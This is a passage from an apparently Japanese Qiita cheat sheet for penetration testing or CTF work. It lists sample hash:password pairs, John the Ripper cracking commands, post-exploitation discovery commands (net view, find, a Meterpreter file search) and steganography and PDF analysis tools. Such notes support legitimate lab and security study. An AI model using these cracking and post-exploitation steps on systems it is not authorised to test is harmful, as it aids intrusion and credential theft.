2777b7fec870e04dda00cd7260f7bee6:P@$$W0rd
f4ab68f27303bcb4024650d8fc5f973a:MYpassword123#

ハッシュタイプが不明な場合

john --format=GOST <ハッシュファイル>

パスワードリストを指定する

john -wordlist:<ファイルパス>

発見(Discovery)

post exploit enum

ネットワークドライブのマウント状況確認

cmd> net view
# その後pushdを使う

ファイル検索

Linux

find / -name <ファイル名> 2>/dev/null

共通

meterpriter> search -f <ファイル名>

その他解析系

画像ファイルの解析

ファイルの埋め込み確認

binwalk <ファイル>

ステガノグラフィー確認

パスフレーズが必要

埋め込み確認

steghide info <ファイル>

データ抽出

steghide extract -xf <ファイル>

パスワードがない場合、オンラインツールを利用する

https://futureboy.us/stegano/decinput.html

PDFファイルの解析

PDFファイル内部の画像抽出

pdfimages <Target PDF> <Export File Name>
3
4
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
3
4